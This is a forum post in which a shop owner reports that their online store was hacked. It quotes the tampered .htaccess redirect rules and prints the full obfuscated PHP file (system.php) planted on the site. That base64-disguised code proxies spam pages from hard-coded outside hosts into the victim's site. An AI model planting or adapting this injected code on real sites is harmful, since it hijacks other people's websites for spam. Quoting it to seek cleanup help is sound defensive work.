Пошук по сайту

Добрый день, интернет магазин стоит на версии 0.2.0 Сегодня обнаружил следующее, на сайте разместили в папке совершенно другой сайт и google проиндексировал, вот как это выглядит: сам сайт: http://www.******.ru/ и взломанные страницы вида *****.ru/books/rukovodstvo-po-remontu-folksvagen-passat/ Что нашел: файл htaccess изменен, в нем прописан редирект: RewriteEngine On RewriteBase / RewriteCond %{HTTP_HOST} !^$ [NC] RewriteCond %{HTTP_HOST} !^www. [NC] RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L] RewriteRule ^books(.*) /system/system.php?id=$1 RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !/books RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA] Как видим он обращается к файлу /system/system.php В нем следующий код: <? $GLOBALS['_483328755_']=Array(base64_decode('Y3Vy' .'bF9pbml0'),base64_decode('Y3' .'VybF9zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9zZXRv' .'cHQ='),base64_decode('Y3VybF9leG' .'V' .'j'),base64_decode('Y' .'3VybF9' .'jbG9zZ' .'Q=' .'='),base64_decode('c3R' .'yc3Ry'),base64_decode('aGV' .'hZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'aGVhZG' .'V' .'y'),base64_decode('' .'c3R' .'yc3' .'Ry'),base64_decode('c' .'3' .'Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc' .'3R' .'y'),base64_decode('' .'aG' .'Vh' .'ZGVy'),base64_decode('' .'aGVh' .'ZGV' .'y'),base64_decode('Y3VybF9' .'pb' .'ml0'),base64_decode('Y3Vy' .'bF9zZX' .'RvcHQ' .'='),base64_decode('Y3VybF9zZX' .'RvcHQ' .'='),base64_decode('Y3Vyb' .'F9leGVj'),base64_decode('Y' .'3VybF9jbG9' .'zZQ' .'=='),base64_decode('c3' .'Ry' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('' .'c3Ryc3Ry'),base64_decode('' .'a' .'GV' .'h' .'ZGVy'),base64_decode('c' .'3R' .'yc' .'3R' .'y'),base64_decode('c3' .'Ryc3Ry'),base64_decode('a' .'GVh' .'ZGVy'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('aGVhZGVy'),base64_decode('' .'a' .'GVhZGV' .'y')); ?><? function _1894674912($i){$a=Array('aWQ=','aHR0cDovL2VtYWlsZXJycnIucnUv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx','aWQ=','aHR0cDovL2FsZW5zZXQuaW4vZXJhbS9wcmVtaWVyZGV0ZWN0LnJ1Lw==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? function l__0(){$_0=$_REQUEST[_1894674912(0)];$_1=$GLOBALS['_483328755_'][0]();$_2=_1894674912(1) .$_0;$GLOBALS['_483328755_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_483328755_'][3]($_1);$GLOBALS['_483328755_'][4]($_1);if($GLOBALS['_483328755_'][5]($_0,_1894674912(2))){$GLOBALS['_483328755_'][6](_1894674912(3));}elseif($GLOBALS['_483328755_'][7]($_0,_1894674912(4))){$GLOBALS['_483328755_'][8](_1894674912(5));}elseif($GLOBALS['_483328755_'][9]($_0,_1894674912(6))|| $GLOBALS['_483328755_'][10]($_0,_1894674912(7))){$GLOBALS['_483328755_'][11](_1894674912(8));}elseif($GLOBALS['_483328755_'][12]($_0,_1894674912(9))){$GLOBALS['_483328755_'][13](_1894674912(10));}else{$GLOBALS['_483328755_'][14](_1894674912(11));}echo $_3;}$_0=$_REQUEST[_1894674912(12)];$_1=$GLOBALS['_483328755_'][15]();$_2=_1894674912(13) .$_0;$GLOBALS['_483328755_'][16]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][17]($_1,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_3=$GLOBALS['_483328755_'][18]($_1);$GLOBALS['_483328755_'][19]($_1);if($GLOBALS['_483328755_'][20]($_0,_1894674912(14))){$GLOBALS['_483328755_'][21](_1894674912(15));}elseif($GLOBALS['_483328755_'][22]($_0,_1894674912(16))){$GLOBALS['_483328755_'][23](_1894674912(17));}elseif($GLOBALS['_483328755_'][24]($_0,_1894674912(18))|| $GLOBALS['_483328755_'][25]($_0,_1894674912(19))){$GLOBALS['_483328755_'][26](_1894674912(20));}elseif($GLOBALS['_483328755_'][27]($_0,_1894674912(21))){$GLOBALS['_483328755_'][28](_1894674912(22));}else{$GLOBALS['_483328755_'][29](_1894674912(23));}echo $_3; ?> Если изменять и удалять файлы они восстанавливаются. Если изменять права, то все равно восстанавливаются. Пароли от FTP менял, машина чистая, значит где-то shell. Что нашел в интернете, вот статья очень похожая: http://terror-web.uc...gazina/1-1-0-51 Вопрос. Как теперь мне избавится от этой заразы. Ведь интернет магазин допиливался очень сильно, переход на новый движок повличет огромные переделки.